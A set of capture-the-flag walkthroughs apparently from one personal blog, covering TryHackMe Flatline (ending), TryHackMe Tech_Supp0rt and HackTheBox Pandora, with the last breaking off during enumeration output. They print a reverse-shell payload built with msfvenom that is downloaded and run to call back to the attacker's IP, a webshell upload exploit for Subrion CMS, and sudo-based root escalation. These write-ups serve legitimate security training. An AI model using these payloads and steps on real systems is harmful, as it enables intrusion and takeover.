-a----       08/11/2021     18:24      108048384 FreeSWITCH-1.10.1-Release-x64.msi                                     
-a----       08/11/2021     06:05      413584335 OpenClinicSetup5.194.18_32bit_full_fr_en_pt_es_nl.exe

I am guessing this OpenClinic software is installed. Looking around the system further, we find its installation location at C:\projects\openclinic.


PS C:\projects\openclinic> gci

    Directory: C:\projects\openclinic

Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----       09/11/2021     07:29                jdk1.8                                                                
d-----       09/11/2021     07:19                mariadb                                                               
d-----       09/11/2021     07:30                tomcat8                                                               
d-----       09/11/2021     07:29                Uninstall                                                             
-a----       06/04/2021     23:14            250 configureCountry.bat                                                  
-a----       01/07/2021     18:20            167 configureLanguage.bat                                                 
-a----       09/11/2021     07:18         334840 lua5.1.dll                                                            
-a----       07/06/2021     16:58          93696 OpenClinic GA login.exe                                               
-a----       08/05/2020     12:17          27136 OpenClinicStartServices.exe                                           
-a----       02/05/2021     00:45            316 stopOpenClinicHttp.bat                                                
-a----       09/11/2021     07:18        1389568 uninstall.exe

Let's see what we can do with this.

┌──(kali㉿kali)-[~/Documents/ctf_tools]
└─$ searchsploit openclinic
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                             |  Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
OpenClinic GA 5.194.18 - Local Privilege Escalation                                                                        | windows/local/50448.txt
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------

Details of this exploit here => https://www.exploit-db.com/exploits/50448

According to the instructions we need to replace the mysqld.exe present in the OpenClinic installation with a malicious payload generated by us.

Let's see if we have the permissions to do that.


PS C:\projects\openclinic\mariadb\bin> get-acl -Path .

    Directory: C:\projects\openclinic\mariadb

Path Owner                  Access                                                                                     
---- -----                  ------                                                                                     
bin  BUILTIN\Administrators NT AUTHORITY\SYSTEM Allow  FullControl...

PS C:\projects\openclinic\mariadb\bin> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                                    Type             SID          Attributes                                                     
============================================================= ================ ============ ===============================================================
Everyone                                                      Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114    Mandatory group, Enabled by default, Enabled group             
BUILTIN\Administrators                                        Alias            S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users                                                 Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\BATCH                                            Well-known group S-1-5-3      Mandatory group, Enabled by default, Enabled group             
CONSOLE LOGON                                                 Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\Authenticated Users                              Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\This Organization                                Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\Local account                                    Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group             
LOCAL                                                         Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\NTLM Authentication                              Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group             
Mandatory Label\High Mandatory Level                          Label            S-1-16-12288

Looks like we can.

Let's begin.

Generate Payload

On our machine.

└─$ msfpc powershell 10.14.31.78 443 cmd reverse stageless exe
 [*] MSFvenom Payload Creator (MSFPC v1.4.5)
 [i]   IP: 10.14.31.78
 [i] PORT: 443
 [i] TYPE: windows (windows/shell_reverse_tcp)
 [i]  CMD: msfvenom -p windows/shell_reverse_tcp -f exe \
  --platform windows -a x86 -e generic/none LHOST=10.14.31.78 LPORT=443 \
  > '/home/kali/Documents/ctf/thm_easy_flatline/windows-shell-stageless-reverse-tcp-443.exe'

 [i] windows shell created: '/home/kali/Documents/ctf/thm_easy_flatline/windows-shell-stageless-reverse-tcp-443.exe'

 [i] MSF handler file: '/home/kali/Documents/ctf/thm_easy_flatline/windows-shell-stageless-reverse-tcp-443-exe.rc'
 [i] Run: msfconsole -q -r '/home/kali/Documents/ctf/thm_easy_flatline/windows-shell-stageless-reverse-tcp-443-exe.rc'
 [?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
 [*] Done!

└─$ mv windows-shell-stageless-reverse-tcp-443.exe mysqld.exe

On the server.

We will have to restart the computer as per the exploit instructions.

PS C:\projects\openclinic\mariadb\bin> mv mysqld.exe mysqld.exe.bak

PS C:\projects\openclinic\mariadb\bin> IWR -Uri http://10.14.31.78/mysqld.exe -OutFile mysqld.exe                    

PS C:\projects\openclinic> Restart-Computer

Now we wait for our reverse shell to activate.


└─$ ncat -lnvp 443
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.52.62.
Ncat: Connection from 10.10.52.62:49669.
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

DONE! Go get that root flag!

TryHackMe Tech_Supp0rt: 1 Walkthrough

Krishna — Sun, 06 Nov 2022 03:34:32 +0000

TryHackMe Page for the Machine => https://tryhackme.com/room/techsupp0rt1

Enum

rustscan nmap

rustscan -a 10.10.26.146 -- -A

PORT    STATE SERVICE     REASON  VERSION
22/tcp  open  ssh         syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 10:8a:f5:72:d7:f9:7e:14:a5:c5:4f:9e:97:8b:3d:58 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCtST3F95eem6k4V02TcUi7/Qtn3WvJGNfqpbE+7EVuN2etoFpihgP5LFK2i/EDbeIAiEPALjtKy3gFMEJ5QDCkglBYt3gUbYv29TQBdx+LZQ8Kjry7W+KCKXhkKJEVnkT5cN6lYZIGAkIAVXacZ/YxWjj+ruSAx07fnNLMkqsMR9VA+8w0L2BsXhzYAwCdWrfRf8CE1UEdJy6WIxRsxIYOk25o9R44KXOWT2F8pP2tFbNcvUMlUY6jGHmXgrIEwDiBHuwd3uG5cVVmxJCCSY6Ygr9Aa12nXmUE5QJE9lisYIPUn9IjbRFb2d2hZE2jQHq3WCGdAls2Bwnn7Rgc7J09
|   256 7f:10:f5:57:41:3c:71:db:b5:5b:db:75:c9:76:30:5c (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBClT+wif/EERxNcaeTiny8IrQ5Qn6uEM7QxRlouee7KWHrHXomCB/Bq4gJ95Lx5sRPQJhGOZMLZyQaKPTIaILNQ=
|   256 6b:4c:23:50:6f:36:00:7c:a6:7c:11:73:c1:a8:60:0c (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDolvqv0mvkrpBMhzpvuXHjJlRv/vpYhMabXxhkBxOwz
80/tcp  open  http        syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
139/tcp open  netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn syn-ack Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: TECHSUPPORT; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -1h49m59s, deviation: 3h10m30s, median: 0s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 18468/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 42676/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 46039/udp): CLEAN (Timeout)
|   Check 4 (port 2861/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: techsupport
|   NetBIOS computer name: TECHSUPPORT\x00
|   Domain name: \x00
|   FQDN: techsupport
|_  System time: 2022-11-04T17:24:12+05:30
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-11-04T11:54:12
|_  start_date: N/A

SMB Server Enum

└─$ crackmapexec smb techsupport.thm -u '' -p '' 
SMB         techsupport.thm 445    TECHSUPPORT      [*] Windows 6.1 (name:TECHSUPPORT) (domain:) (signing:False) (SMBv1:True)
SMB         techsupport.thm 445    TECHSUPPORT      [+] \: 


└─$ crackmapexec smb techsupport.thm -u 'a' -p '' --shares
SMB         techsupport.thm 445    TECHSUPPORT      [*] Windows 6.1 (name:TECHSUPPORT) (domain:) (signing:False) (SMBv1:True)
SMB         techsupport.thm 445    TECHSUPPORT      [+] \a: 
SMB         techsupport.thm 445    TECHSUPPORT      [+] Enumerated shares
SMB         techsupport.thm 445    TECHSUPPORT      Share           Permissions     Remark
SMB         techsupport.thm 445    TECHSUPPORT      -----           -----------     ------
SMB         techsupport.thm 445    TECHSUPPORT      print$                          Printer Drivers
SMB         techsupport.thm 445    TECHSUPPORT      websvr          READ            
SMB         techsupport.thm 445    TECHSUPPORT      IPC$                            IPC Service (TechSupport server (Samba, Ubuntu))

┌──(kali㉿kali)-[~/Documents/ctf/thm_easy_techsupport]
└─$ smbclient //techsupport.thm/websvr   
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> PROMPT OFF
smb: \> RECURSE ON
smb: \> mget *
getting file \enter.txt of size 273 as enter.txt (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
smb: \> exit

┌──(kali㉿kali)-[~/Documents/ctf/thm_easy_techsupport]
└─$ ll    
total 4
-rw-r--r-- 1 kali kali 273 Nov  4 08:58 enter.txt

┌──(kali㉿kali)-[~/Documents/ctf/thm_easy_techsupport]
└─$ cat enter.txt                                         
GOALS
=====
1)Make fake popup and host it online on Digital Ocean server
2)Fix subrion site, /subrion doesn't work, edit from panel
3)Edit wordpress website

IMP
===
Subrion creds
|->admin:7sKvntXdPEJaxazce9PXi24zaFrLiKWCk [cooked with magical formula]
Wordpress creds
|->

Trying to access this /subrion folder. Did not work in the browser. So tried accessing it via curl

└─$ curl -v http://techsupport.thm/subrion/
*   Trying 10.10.26.146:80...
* Connected to techsupport.thm (10.10.26.146) port 80 (#0)
> GET /subrion/ HTTP/1.1
> Host: techsupport.thm
> User-Agent: curl/7.85.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 302 Found
< Date: Fri, 04 Nov 2022 13:04:03 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Set-Cookie: INTELLI_06c8042c3d=0knjt7oo4bvcpfd14hns363f0i; path=/
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Set-Cookie: INTELLI_06c8042c3d=0knjt7oo4bvcpfd14hns363f0i; expires=Fri, 04-Nov-2022 13:34:03 GMT; Max-Age=1800; path=/
< Location: http://10.0.2.15/subrion/subrion/
< Content-Length: 0
< Content-Type: text/html; charset=UTF-8
< 
* Connection #0 to host techsupport.thm left intact

No wonder its not working. There is a 302 redirect to a strange IP. Also a strange cookie value.

The enter.txt mentions a panel, which I am guessing is some kind of CMS admin panel.

Let's try and find it. Modifying my usual ffuf statement to remove the -r option to ensure redirects are not followed. Also filtering for 302 status codes. Regarding the 302, the server seems to be configured to return a 302 redirect to 10.0.2.15, when we try to access a subfolder of subrion, which will make fuzzing a pain in the behind if we dont handle it properly.

Example

└─$ curl -v http://techsupport.thm/subrion/whatintheworld/
*   Trying 10.10.26.146:80...
* Connected to techsupport.thm (10.10.26.146) port 80 (#0)
> GET /subrion/whatintheworld/ HTTP/1.1
> Host: techsupport.thm
> User-Agent: curl/7.85.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 302 Found
< Date: Fri, 04 Nov 2022 13:21:48 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Set-Cookie: INTELLI_06c8042c3d=0e7gu6bkk63fuvtkv8t5rfk5sr; path=/
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Set-Cookie: INTELLI_06c8042c3d=0e7gu6bkk63fuvtkv8t5rfk5sr; expires=Fri, 04-Nov-2022 13:51:48 GMT; Max-Age=1800; path=/
< Location: http://10.0.2.15/subrion/subrion/whatintheworld/
< Content-Length: 0
< Content-Type: text/html; charset=UTF-8
< 
* Connection #0 to host techsupport.thm left intact

Note: Also removed the -recursion option. There is a / after FUZZ. If we don't add this, the server returns a 301 with the slash added. But for the recursion option to work, the FUZZ keyword needs to be the last thing on the URL string.

Now, let's fuzz!

└─$ ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -u http://techsupport.thm/subrion/FUZZ/ -o ffuf/raftLarge -of html -ic -c -e .txt,.html,.bak,.gz,.zip,.php,.db,.sql,.tar.gz -sf -t 50 -fc 302 

install                 [Status: 200, Size: 13125, Words: 6273, Lines: 212, Duration: 311ms]
updates                 [Status: 403, Size: 280, Words: 20, Lines: 10, Duration: 196ms]
panel.php               [Status: 200, Size: 6275, Words: 1618, Lines: 107, Duration: 792ms]
panel.sql               [Status: 200, Size: 6275, Words: 1618, Lines: 107, Duration: 792ms]
panel.bak               [Status: 200, Size: 6275, Words: 1618, Lines: 107, Duration: 792ms]
panel.db                [Status: 200, Size: 6275, Words: 1618, Lines: 107, Duration: 792ms]
panel                   [Status: 200, Size: 6275, Words: 1618, Lines: 107, Duration: 793ms]
panel.html              [Status: 200, Size: 6275, Words: 1618, Lines: 107, Duration: 793ms]
panel.zip               [Status: 200, Size: 6275, Words: 1618, Lines: 107, Duration: 793ms]
panel.txt               [Status: 200, Size: 6275, Words: 1618, Lines: 107, Duration: 793ms]
panel.gz                [Status: 200, Size: 6275, Words: 1618, Lines: 107, Duration: 794ms]

http://techsupport.thm/subrion/install/install/ - Pre-installation check. Shows software versions of multiple installed software on the machine.
http://techsupport.thm/subrion/panel/ - Login portal. The credentials we found earlier in the SMB share dont work.

Trying to decode password in Cyberchef.
https://gchq.github.io/CyberChef/#recipe=From_Base58('123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz',false)From_Base32('A-Z2-7%3D',false)From_Base64('A-Za-z0-9%2B/%3D',true,false)

Subrion Admin Portal Enum

After login.

Subrion Version 4.2.1 is installed. Searching for anything regarding this version on ExploitDB, we get https://www.exploit-db.com/exploits/49876. An arbitrary file upload exploit.

Let's try and use it.

Uploading a reverse shell using CVE-2018-19422

Don't forget to add the slash after panel in the URL when running the exploit.

└─$ python3 49876.py -u http://techsupport.thm/subrion/panel/ --user=admin --passw=CENSORED
[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422 

[+] Trying to connect to: http://techsupport.thm/subrion/panel/
[+] Success!
[+] Got CSRF token: 7LJC4WPSmVW99qpA8XKWZZPAUDIcilg43wfRfpQi
[+] Trying to log in...
[+] Login Successful!

[+] Generating random name for Webshell...
[+] Generated webshell name: ipmrjrdahkbtipn

[+] Trying to Upload Webshell..
[+] Upload Success... Webshell path: http://techsupport.thm/subrion/panel/uploads/ipmrjrdahkbtipn.phar 

$

The above exploit gives us a command shell. Let's pivot to a full featured reverse shell by running a Python3 reverse shell command.
Here are some good examples => https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#python

With this shell, we can get a foothold on the machine.

Foothold

wp-config.php

/** The name of the database for WordPress */
define( 'DB_NAME', 'wpdb' );

/** MySQL database username */
define( 'DB_USER', 'support' );

/** MySQL database password */
define( 'DB_PASSWORD', 'CENSORED' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

Trying to do an SSH login to the scamsite user(which we found in the home folder) using the above password?

Success!! We now have a proper login shell.

Let's try for privesc

Privesc

scamsite@TechSupport:~$ sudo -l
Matching Defaults entries for scamsite on TechSupport:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User scamsite may run the following commands on TechSupport:
    (ALL) NOPASSWD: /usr/bin/iconv

Looks like we have sudo permissions for one command. Let's see if we can leverage that for privesc.

Yes we can => https://gtfobins.github.io/gtfobins/iconv/#sudo

scamsite@TechSupport:~$ sudo /usr/bin/iconv 8859_1 -t 8859_1 /root/root.txt
/usr/bin/iconv: cannot open input file `8859_1': No such file or directory
CENSORED  -

DONE!!

Also follow me on Mastodon.

HackTheBox Pandora Walkthrough

Krishna — Fri, 27 May 2022 13:42:19 +0000

Link to Box => https://app.hackthebox.com/machines/Pandora/

Enumeration

nmap initial scan

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDPIYGoHvNFwTTboYexVGcZzbSLJQsxKopZqrHVTeF8oEIu0iqn7E5czwVkxRO/icqaDqM+AB3QQVcZSDaz//XoXsT/NzNIbb9SERrcK/n8n9or4IbXBEtXhRvltS8NABsOTuhiNo/2fdPYCVJ/HyF5YmbmtqUPols6F5y/MK2Yl3eLMOdQQeax4AWSKVAsR+issSZlN2rADIvpboV7YMoo3ktlHKz4hXlX6FWtfDN/ZyokDNNpgBbr7N8zJ87+QfmNuuGgmcZzxhnzJOzihBHIvdIM4oMm4IetfquYm1WKG3s5q70jMFrjp4wCyEVbxY+DcJ54xjqbaNHhVwiSWUZnAyWe4gQGziPdZH2ULY+n3iTze+8E4a6rxN3l38d1r4THoru88G56QESiy/jQ8m5+Ang77rSEaT3Fnr6rnAF5VG1+kiA36rMIwLabnxQbAWnApRX9CHBpMdBj7v8oLhCRn7ZEoPDcD1P2AASdaDJjRMuR52YPDlUSDd8TnI/DFFs=
|   256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNNJGh4HcK3rlrsvCbu0kASt7NLMvAUwB51UnianAKyr9H0UBYZnOkVZhIjDea3F/CxfOQeqLpanqso/EqXcT9w=
|   256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOCMYY9DMj/I+Rfosf+yMuevI7VFIeeQfZSxq67EGxsb
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Play | Landing
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-favicon: Unknown favicon MD5: 115E49F9A03BB97DEB840A3FE185434C
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Web Server Enum

└─$ ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -u http://pandora.htb/FUZZ -o ffuf/ffufRaft -of html -ic -r -recursion -recursion-depth 4 -c -e .txt,.html,.bak,.gz,.zip,.php,.db,.sql,.tar.gz -sf

assets                  [Status: 200, Size: 1690, Words: 112, Lines: 21]
index.html              [Status: 200, Size: 33560, Words: 13127, Lines: 908]
server-status           [Status: 403, Size: 276, Words: 20, Lines: 10]
.html                   [Status: 403, Size: 276, Words: 20, Lines: 10]
.php                    [Status: 403, Size: 276, Words: 20, Lines: 10]
                        [Status: 200, Size: 33560, Words: 13127, Lines: 908]

Tried some other wordlists as well. Nothing useful came up.

ffuf subdomain test

ffuf -u http://pandora.htb -H "Host: FUZZ.pandora.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -c -o ffuf/subdomain -of html -fs 33560

EMPTY

nikto -h

nikto -h http://panda.htb/
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 8318, size: 5d23e548bc656, mtime: gzip
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
+ /: A Wordpress installation was found.

observations

Web Dir listing seems to be enabled. Check http://pandora.htb/assets/
Prescence of http://pandora.htb/assets/images/blog/ suggests there is a blog somewhere. We have to find it. Perhaps a login is available?
nikto output also has a weird line. Not really sure what that means though

nmap UDP scan

Scanning UDP as a last resort, since the website is a dead end.

sudo nmap -sUV panda.htb -oN nmap/udpFirst -vv

PORT    STATE SERVICE REASON              VERSION
161/udp open  snmp    udp-response ttl 63 SNMPv1 server; net-snmp SNMPv3 server (public)
Service Info: Host: pandora

So we have found an SNMP port. This is possibly a foothold vector. Let's try getting some info.

Using this as a guide => https://medium.com/@minimalist.ascent/enumerating-snmp-servers-with-nmap-89aaf33bce28

└─$ sudo nmap -sUV -p 161 --script=snmp-info pandora.htb
[sudo] password for kali: 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-14 02:42 EST
Nmap scan report for pandora.htb (10.10.11.136)
Host is up (0.047s latency).

PORT    STATE SERVICE VERSION
161/udp open  snmp    SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info: 
|   enterprise: net-snmp
|   engineIDFormat: unknown
|   engineIDData: 48fa95537765c36000000000
|   snmpEngineBoots: 30
|_  snmpEngineTime: 25m05s
Service Info: Host: pandora

└─$ sudo nmap -sUV -p 161 --script=snmp-interfaces pandora.htb
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-14 02:43 EST
Nmap scan report for pandora.htb (10.10.11.136)
Host is up (0.046s latency).

PORT    STATE SERVICE VERSION
161/udp open  snmp    SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-interfaces: 
|   lo
|     IP address: 127.0.0.1  Netmask: 255.0.0.0
|     Type: softwareLoopback  Speed: 10 Mbps
|     Status: up
|     Traffic stats: 142.54 Kb sent, 142.54 Kb received
|   VMware VMXNET3 Ethernet Controller
|     IP address: 10.10.11.136  Netmask: 255.255.254.0
|     MAC address: 00:50:56:b9:3f:d3 (VMware)
|     Type: ethernetCsmacd  Speed: 4 Gbps
|     Status: up
|_    Traffic stats: 146.13 Kb sent, 165.78 Kb received
Service Info: Host: pandora


└─$ sudo nmap -sUV -p 161 --script=snmp-netstat pandora.htb
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-14 02:44 EST
Nmap scan report for pandora.htb (10.10.11.136)
Host is up (0.045s latency).

PORT    STATE SERVICE VERSION
161/udp open  snmp    SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-netstat: 
|   TCP  0.0.0.0:22           0.0.0.0:0
|   TCP  10.10.11.136:54460   1.1.1.1:53
|   TCP  127.0.0.1:3306       0.0.0.0:0
|   TCP  127.0.0.53:53        0.0.0.0:0
|   UDP  0.0.0.0:161          *:*
|_  UDP  127.0.0.53:53        *:*
Service Info: Host: pandora


└─$ sudo nmap -sUV -p 161 --script=snmp-sysdescr pandora.htb
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-14 02:46 EST
Nmap scan report for pandora.htb (10.10.11.136)
Host is up (0.046s latency).

PORT    STATE SERVICE VERSION
161/udp open  snmp    SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-sysdescr: Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64
|_  System uptime: 29m2.87s (174287 timeticks)


Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-14 02:47 EST
Nmap scan report for pandora.htb (10.10.11.136)
Host is up (0.045s latency).

PORT    STATE SERVICE VERSION
161/udp open  snmp    SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-processes:
|   849: 
|     Name: sh
|     Path: /bin/sh
|     Params: -c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p CENSORED'
|   863: 
|     Name: snmpd
|     Path: /usr/sbin/snmpd
|     Params: -LOw -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f -p /run/snmpd.pid
|   1103: 
|     Name: host_check
|     Path: /usr/bin/host_check
|     Params: -u daniel -p CENSORED

We may have inadvertently found some credentials. Trying the combo daniel:CENSORED on the SSH port

SUCCESS!! This was way easier than expected

Foothold

User flag is not present in the home directory. Trying to search for it.

daniel@pandora:~$ find / -type f -name user.txt 2>/dev/null 
/home/matt/user.txt

daniel@pandora:/home/matt$ ls -la
total 24
drwxr-xr-x 2 matt matt 4096 Dec  7 15:00 .
drwxr-xr-x 4 root root 4096 Dec  7 14:32 ..
lrwxrwxrwx 1 matt matt    9 Jun 11  2021 .bash_history -> /dev/null
-rw-r--r-- 1 matt matt  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 matt matt 3771 Feb 25  2020 .bashrc
-rw-r--r-- 1 matt matt  807 Feb 25  2020 .profile
-rw-r----- 1 root matt   33 Jan 14 07:17 user.txt

We will have to find a way to pivot to the matt user if we are to get the user flag.

Privesc

While looking for SUID binaries, found this

daniel@pandora:/home/matt$ ls -lh /usr/bin/pandora_backup
-rwsr-x--- 1 root matt 17K Dec  3 15:58 /usr/bin/pandora_backup

Cant really do much with it tho. As we are not the matt user.

Anyway running linpeas.sh now. We are running under daniel, so we dont have a lot of privileges.

linpeas run

Interesting Stuff only.

╔══════════╣ CVEs Check
Vulnerable to CVE-2021-4034

╔══════════╣ Protections
═╣ Is ASLR enabled? ............... Yes                                                                                                                      
═╣ Is this a virtual machine? ..... Yes (vmware)            

══════════╣ Cleaned processes                                                                                                                               
╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes
systemd+     528  0.0  0.1  18408  7456 ?        Ss   16:13   0:00 /lib/systemd/systemd-networkd
  └─(Caps) 0x0000000000003c00=cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw
root         779  0.0  0.0   6812  2772 ?        Ss   16:13   0:00 /usr/sbin/cron -f
root         797  0.0  0.0   8352  3396 ?        S    16:13   0:00  _ /usr/sbin/CRON -f
root         810  0.0  0.0   2608   548 ?        Ss   16:13   0:00      _ /bin/sh -c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p CENSORED'
root        1119  0.0  0.0   2488  1428 ?        S    16:13   0:00          _ /usr/bin/host_check -u daniel -p CENSORED

# What in the world? cap_setuid ??
root         838  0.0  0.7 228068 31468 ?        Ss   16:13   0:01 /usr/sbin/apache2 -k start
www-data    1050  0.0  0.3 228500 13756 ?        S    16:13   0:00  _ /usr/sbin/apache2 -k start
  └─(Caps) 0x00000000008000c4=cap_dac_read_search,cap_setgid,cap_setuid,cap_sys_nice
www-data    1051  0.0  0.3 228500 13756 ?        S    16:13   0:00  _ /usr/sbin/apache2 -k start
  └─(Caps) 0x00000000008000c4=cap_dac_read_search,cap_setgid,cap_setuid,cap_sys_nice
www-data    1052  0.0  0.3 228500 13756 ?        S    16:13   0:00  _ /usr/sbin/apache2 -k start
  └─(Caps) 0x00000000008000c4=cap_dac_read_search,cap_setgid,cap_setuid,cap_sys_nice
www-data    1053  0.0  0.3 228500 13756 ?        S    16:13   0:00  _ /usr/sbin/apache2 -k start
  └─(Caps) 0x00000000008000c4=cap_dac_read_search,cap_setgid,cap_setuid,cap_sys_nice
www-data    1054  0.0  0.3 228500 13756 ?        S    16:13   0:00  _ /usr/sbin/apache2 -k start
  └─(Caps) 0x00000000008000c4=cap_dac_read_search,cap_setgid,cap_setuid,cap_sys_nice
www-data    1123  0.0  0.3 228500 13756 ?        S    16:13   0:00  _ /usr/sbin/apache2 -k start
  └─(Caps) 0x00000000008000c4=cap_dac_read_search,cap_setgid,cap_setuid,cap_sys_nice

╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports                                                                                
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                                                                            
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -  

╔══════════╣ Superusers
root:x:0:0:root:/root:/bin/bash                                                                                                                              

╔══════════╣ Users with console
daniel:x:1001:1001::/home/daniel:/bin/bash                                                                                                                   
matt:x:1000:1000:matt:/home/matt:/bin/bash
root:x:0:0:root:/root:/bin/bash

╔══════════╣ Useful software
/usr/bin/base64                                                                                                                                              
/usr/bin/curl
/usr/bin/nc
/usr/bin/netcat
/usr/bin/nmap
/usr/bin/perl
/usr/bin/php
/usr/bin/ping
/usr/bin/python3
/usr/bin/socat
/usr/bin/sudo
/usr/bin/wget

╔══════════╣ MySQL
mysql  Ver 15.1 Distrib 10.3.32-MariaDB, for debian-linux-gnu (x86_64) using readline 5.2                                                                    

═╣ MySQL connection using default root/root ........... No                                                                                                   
